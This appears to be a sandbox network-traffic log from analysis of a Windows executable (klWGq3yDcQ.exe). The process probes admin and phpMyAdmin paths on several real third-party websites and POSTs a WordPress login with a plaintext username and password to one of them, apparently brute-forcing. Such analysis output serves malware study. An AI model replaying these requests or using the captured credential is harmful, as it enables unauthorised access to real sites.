                                                                                                                                                                                                    2023-11-26 06:00:06 UTC15763INData Raw: 37 64 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 7d88<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC16381INData Raw: 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 61 64 65 73 69 76 6f 73 2d 64 65 63 61 6c 71 75 65 73 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 41 64 65 73 69 76 6f 73 20 26 61 6d 70 3b 20 44 65 63 61 6c 71 75 65 73 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09
                                                                                                                                                                                                    Data Ascii: onclick="sendKinesisDataAjax({actionID: 'click',actionData:`adesivos-decalques - category2`})">Adesivos &amp; Decalques</a><a class="sub-menu-item-link"
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC16384INData Raw: 37 66 65 30 0d 0a 74 65 72 2d 73 65 6c 65 63 74 20 79 2d 79 65 61 72 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4e c3 ba 6d 65 72 6f 20 64 65 20 53 c3 a9 72 69 65 22 2f 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 2d 62 75 74 74 6f 6e 20 62 74 6e 20 62 74 6e 2d 6c 67 20 6e 6f 2d 72 61 64 69 75 73 22 3e 46 69 6c 74 72 61 72 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6e 61 76 3e 0a 09 09 09 0a 09 09 0a 09 0a 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20
                                                                                                                                                                                                    Data Ascii: 7fe0ter-select y-year" placeholder="Nmero de Srie"/><button type="submit" class="filter-button btn btn-lg no-radius">Filtrar</button></div></div></div></div></div></nav><script>var
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC16360INData Raw: 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 77 6f 22 20 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 68 72 65 65 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 66 6f 75 72 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 5f 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 3c 61 20 68 72 65
                                                                                                                                                                                                    Data Ascii: </div><div class="container-secondary-box-two" ></div><div class="container-secondary-box-three"></div><div class="container-secondary-box-four"><div class="footer__logo"><a hre
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC8864INData Raw: 32 32 39 38 0d 0a 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 74 65 6d 70 6c 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 78 2d 68 61 6e 64 6c 65 62 61 72 73 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 09 09 7b 7b 23 69 66 20 73 6b 75 2e 62 65 73 74 7d 7d 0a 09 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 6f 66 66 65 72 73 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 66 66 65 72 22 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 6f 66 66 65 72 22 3e 0a 09 09 3c 6c 69 6e 6b 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 22 2f 3e
                                                                                                                                                                                                    Data Ascii: 2298</script><script id="countdown-template" type="text/x-handlebars-template">{{#if sku.best}}<div itemprop="offers" itemscope="" itemtype="http://schema.org/Offer" class="countdown-offer"><link itemprop="url" href="https://www.rech.com/"/>
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC16384INData Raw: 36 61 64 34 0d 0a 74 22 3e 50 72 61 7a 6f 20 65 20 76 61 6c 6f 72 20 64 6f 20 66 72 65 74 65 3c 2f 6c 61 62 65 6c 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 67 72 6f 75 70 20 72 6f 77 20 64 69 76 2d 63 61 6c 63 75 6c 61 74 65 2d 66 72 65 69 67 68 74 22 3e 0a 09 09 3c 69 6e 70 75 74 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 45 50 20 64 65 20 65 6e 74 72 65 67 61 22 20 6f 6e 66 6f 63 75 73 3d 22 6d 61 73 6b 43 65 70 28 29 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 69 64 3d 22 7a 69 70 63 6f 64 65 43 6f 6d 70 75 74 65 46 72 65 69 67 68 74 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 63 6f 6c 2d 37 20 69 6e 70 75 74 2d 63 61 6c 63 75 6c 61 74 65 2d 66 72 65 69 67 68 74 22 20 6e 61 6d 65 3d 22 63 65 70 22 20 64 61 74 61
                                                                                                                                                                                                    Data Ascii: 6ad4t">Prazo e valor do frete</label><div class="form-group row div-calculate-freight"><input placeholder="CEP de entrega" onfocus="maskCep()" type="text" id="zipcodeComputeFreight" class="form-control col-7 input-calculate-freight" name="cep" data
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC10972INData Raw: 09 09 09 09 09 09 7b 7b 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 55 4e 49 44 41 44 45 53 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 2f 63 6f 6d 70 61 72 65 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 23 63 6f 6d 70 61 72 65 20 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 20 27 3d 3d 27 20 31 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 55 4e 49 44 41 44 45 0a 09 09 09 09 09 09 09 09 09 09 09 09 7b 7b 2f 63 6f 6d 70 61 72 65 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 7b 7b 23 69 66 20 62 65 73 74 2e 63 6f 75 6e 74 64 6f 77 6e 44 69 73 63 6f 75 6e 74 7d 7d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69
                                                                                                                                                                                                    Data Ascii: {{stockRemaining}} UNIDADES{{/compare}}{{#compare stockRemaining '==' 1}}{{stockRemaining}} UNIDADE{{/compare}}</div>{{#if best.countdownDiscount}}<div class="di
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    617192.168.2.4578253.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC164OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC211INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 06:00:06 GMTServer: ApacheLocation: https://www.knu.ac.in/adminContent-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6b 6e 75 2e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/admin">here</a>.</p><hr><address>Apache Server at knu.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    618192.168.2.457907194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC249OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=294c8cffe744133c8b51c696bc79a752
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC98INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Foundcontent-length: 0location: /cache-control: no-cacheconnection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    619192.168.2.457854120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC175OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC523INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6e 6e 30 67 37 72 68 32 6d 69 76 33 36 39 6f 75 34 36 6c 6f 62 67 35 70 6d 62 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 37 3a 30 30 3a 30 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 06:00:07 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=nn0g7rh2miv369ou46lobg5pmb; expires=Sun, 26-Nov-2023 07:00:07 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    620192.168.2.457962144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC398OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; tk_ai=jetpack%3AKIbxliTbCWm3cOu8N5Br803S
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gruporegiosafety.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 147
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC147OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 26 70 77 64 3d 43 6f 6d 70 72 61 73 47 52 53 32 30 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=administrator&pwd=ComprasGRS2023&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fgruporegiosafety.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC352INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC7840INData Raw: 32 38 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 28cd<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC2611INData Raw: 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 6c 6f 63 61 6c 65 5f 64 61 74 61 22 3a 7b 22 6d 65 73 73 61 67 65 73 22 3a 7b 22 22 3a 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 70 6c 75 72 61 6c 2d 66 6f 72 6d 73 22 3a 22 6e 70 6c 75 72 61 6c 73 3d 32 3b 20 70 6c 75 72 61 6c 3d 6e 20 21 3d 20 31 3b 22 2c 22 6c 61 6e 67 22 3a 22 65 73 5f 4d 58 22 7d 2c 22 25 31 24 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 73 69 6e 63 65 20 76 65 72 73 69 6f 6e 20 25 32 24 73 21 20 55 73 65 20 25 33 24 73 20 69 6e 73 74 65 61 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 69 64 65 72 20 77 72 69 74 69 6e 67 20 6d 6f 72 65 20 69 6e 63 6c 75 73 69 76 65 20 63 6f 64 65 2e 22 3a 5b 22 5c 75 30 30 61 31 25 31 24 73 20 65 73 74 5c 75 30 30
                                                                                                                                                                                                    Data Ascii: "domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n != 1;","lang":"es_MX"},"%1$s is deprecated since version %2$s! Use %3$s instead. Please consider writing more inclusive code.":["\u00a1%1$s est\u00
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    621192.168.2.457899120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC940OUTGET /login/?page=%2Fwp-admin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0pfpv6fic6tscei8l2krgncvto
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJLj9sgFIX3%2BRUj740xzmOMkkjppI9IaRJN0i66qa7heoKEwQN42vz7OmaqaSs1LA%2F3Ozr3wNxDo1u%2B6sLZPOJzhz6M7vrzs9HG8%2BFykXTOcAteeW6gQc%2BD4MfV5y1nhPLW2WCF1ck%2F2G0KvEcXlDUR26wXyX73frv%2FuNl9L%2BsCZ6xiMygKEILeU5nXVT6dVZJhIRkUk0kNExnRr%2Bh877NIettkFN2873BjfAATep2yIs3zlE1PdMop5ZR9i%2Bi6X1YZCAN%2BDqH1PMu0fVKGNEo4620drNHKIBG2ycR9PS7KCaY1jDEd5%2BU0BVmVaQVMSCaAljXNrquzaH94beadMlKZp9uFVHHI80%2Bn0yE97I%2BnaLL6XdSDNb5r0B3RvSiBXx63b5mbCxGgX8BdyLOWBGVHoBuiZCJipD23yXJwnF91PnTkljcd5tmfo29wy3d9%2Fs36YLUSl0G%2Fng%2FWNRD%2Bv2ZO8kFRMq2HUd4Z36JQtcLXxxw21tr%2BeHAIARdJcB0md9lyFLP8%2FVGXvwA%3D&RelayState=%2Fwp-login.php
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC541INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 06:00:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 06:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    622192.168.2.45801718.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC178OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
